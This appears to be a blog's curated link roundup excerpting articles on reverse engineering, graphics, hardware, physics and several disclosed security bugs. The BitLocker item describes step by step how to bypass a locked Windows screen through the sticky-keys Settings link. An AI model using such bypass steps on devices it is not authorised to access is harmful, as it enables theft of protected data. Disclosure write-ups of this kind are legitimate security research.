Lotus 1-2-3 reversing
A ton of hacking later, and I do now have a usable driver for dosemu that supports arbitrary resolutions, just look at all those columns!
How I cut GTA Online loading times by 70%
Some debug-stepping later it turns out it’s… JSON!
Of course it is. But a really solid reversing effort. And a nice fix.
An Exploration of JSON Interoperability Vulnerabilities
The same JSON document can be parsed with different values across microservices, leading to a variety of potential security risks. If you prefer a hands-on approach, try the labs and when they scare you, come back and read on.
Bilinear down/upsampling, aligning pixel grids, and that infamous GPU half pixel offset
It’s been more than two decades of me using bilinear texture filtering, a few months since I’ve written about bilinear resampling, but only two days since I discovered a bug of mine related to it. 😅 Similarly, just last week a colleague asked for a very fast implementation of bilinear on a CPU and it caused a series of questions “which kind of bilinear?”.
So I figured it’s an opportunity for another short blog post – on bilinear filtering, but in context of down/upsampling. We will touch here on GPU half pixel offsets, aligning pixel grids, a bug / confusion in Tensorflow, deeper signal processing analysis of what’s going on during bilinear operations, and analysis of the magic of the famous “magic kernel”.
Decades-Long Quest Reveals Details of the Proton’s Inner Antimatter
Twenty years ago, physicists set out to investigate a mysterious asymmetry in the proton’s interior. Their results, published today, show how antimatter helps stabilize every atom’s core.
We learn in school that a proton is a bundle of three elementary particles called quarks — two “up” quarks and a “down” quark, whose electric charges (+2/3 and −1/3, respectively) combine to give the proton its charge of +1. But that simplistic picture glosses over a far stranger, as-yet-unresolved story.
In reality, the proton’s interior swirls with a fluctuating number of six kinds of quarks, their oppositely charged antimatter counterparts (antiquarks), and “gluon” particles that bind the others together, morph into them and readily multiply. Somehow, the roiling maelstrom winds up perfectly stable and superficially simple — mimicking, in certain respects, a trio of quarks.
Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies
Block Profiling in Go
The block profile in Go lets you analyze how much time your program spends waiting on the blocking operations listed below:
2020 Chrome Extension Performance Report
I tested how the 1000 most popular Chrome extensions affect browser performance. The main metrics I’ll consider are CPU consumption, memory consumption, and whether the extension makes pages render more slowly.
Some results are terrible. Some are worse.
'Smallest reptile on earth' discovered in Madagascar
Two of the tiny lizards were discovered by a German-Madagascan expedition team in Madagascar. The male Brookesia nana, or nano-chameleon, has a body of just 13.5mm.
Improving texture atlas allocation in WebRender
This is a longer version of the piece I published in the mozilla gfx team blog where I focus on the atlas allocation algorithms. In this one I’ll go into more details about the process and methodology behind these improvements. The first part is about the making of guillotiere, a crate that I first released in March 2019. In the second part we’ll have a look at more recent work building upon what I did with guillotiere, to improve texture memory usage in WebRender/Firefox.
Uniwidth typefaces for interface design
Uniwidth typefaces, on the other hand, are proportionally-spaced typefaces, but every character occupies the same space across different cuts or weights. What this means in practice is that no matter which weight you set your text in, it will never change its length or cause text to reflow.
Achieving 11M IOPS & 66 GB/s IO on a Single ThreadRipper Workstation
In this post I’ll explain how I configured my AMD ThreadRipper Pro workstation with 10 PCIe 4.0 SSDs to achieve 11M IOPS with 4kB random reads and 66 GiB/s throughput with larger IOs - and what bottlenecks & issues I fixed to get there. We’ll look into Linux block I/O internals and their interaction with modern hardware. We’ll use tools & techniques, old and new, for measuring bottlenecks - and other adventures in the kernel I/O stack.
Dissecting the Apple M1 GPU
Apple’s latest line of Macs includes their in-house “M1” system-on-chip, featuring a custom GPU. This poses a problem for those of us in the Asahi Linux project who wish to run Linux on our devices, as this custom Apple GPU has neither public documentation nor open source drivers. Some speculate it might descend from PowerVR GPUs, as used in older iPhones, while others believe the GPU to be completely custom. But rumours and speculations are no fun when we can peek under the hood ourselves!
And part II where it really takes off: https://rosenzweig.io/blog/asahi-gpu-part-2.html
Porting Firefox to Apple Silicon
Even with all the pieces in place, quite a bit of work to do.
The release of Apple Silicon-based Macs at the end of last year generated a flurry of news coverage and some surprises at the machine’s performance. This post details some background information on the experience of porting Firefox to run natively on these CPUs.
We’ll start with some background on the Mac transition and give an overview of Firefox internals that needed to know about the new architecture, before moving on to the concept of Universal Binaries.
We’ll then explain how DRM/EME works on the new platform, talk about our experience with macOS Big Sur, and discuss various updater problems we had to deal with. We’ll conclude with the release and an overview of various other improvements that are in the pipeline.
BitLocker Lockscreen bypass
BitLocker is a modern data protection feature that is deeply integrated in the Windows kernel. It is used by many corporations as a means of protecting company secrets in case of theft. Microsoft recommends that you have a Trusted Platform Module which can do some of the heavy cryptographic lifting for you.
If we smash shift 5 times in quick succession, a link to open the Settings app appears, and the link actually works. We cannot see the launched Settings app. Giving the launched app focus is slightly tricky; you have to click the link and then click a place where the launched app would be visible with the correct timing. The easiest way to learn to do it is, keep clicking the link roughly 2 times a second. The sticky keys windows will disappear. Keep clicking! You will now see a focus box is drawn in the middle of the screen. That was the Settings app, and you have to stop clicking when it gets focus.
Accessibility UX wins again.
Leaking silhouettes of cross-origin images
This is a writeup of a vulnerability I found in Chromium and Firefox that could allow a malicious page to read some parts of an image located on an origin it is not supposed to be able to access. Although technically interesting, it is quite limited in scope—I am not aware of any major websites it could’ve been used against. As of November 17th, 2020, the vulnerability has been fixed in the most recent versions of both browsers.
The time that it takes CanvasRenderingContext2D.drawImage to draw a pixel depends on whether it is fully transparent, opaque, or semi-transparent. By timing a bunch of calls to drawImage, we can reliably infer the transparency of each pixel in a cross-origin image, which is enough to, for example, read text on a transparent background, like this:
Ditherpunk — The article I wish I had about monochrome image dithering
Stealing Your Private YouTube Videos, One Frame at a Time
I quickly Googled “base64 to image”, and pasted the base64 into the first decoder I found, and it displayed a thumbnail from the target Private video! It worked! I have found a working IDOR (Insecure Direct Object Reference) bug, where I could get a frame from any private video on YouTube!
GNOME has no thumbnails in the file picker (and my toilets are blocked)
The file picker is the pop-up box thingy that appears when you’re opening a file, usually when uploading something online. The GNOME desktop environment uses the file picker package GtkFileChooser. This file picker does not have a thumbnail view. It is broken software. Thumbnails are not a cute little extra, they are essential. This is as bad as a file picker that doesn’t list the name of the files, only their creation date, or inode serial number. It is broken software.
Personally, not a big deal, but fair point.
Cincinnati Built a Subway System 100 Years Ago–But Never Used It
The Cincinnati subway stations are still there. But if you’re still waiting for a train to come, you’ve been waiting for almost a century. To this day Cincinnati remains home to the largest unused subway system in the world, with over two miles of empty tunnels. Engineers who inspected the tunnels recently deemed them in “very good condition.”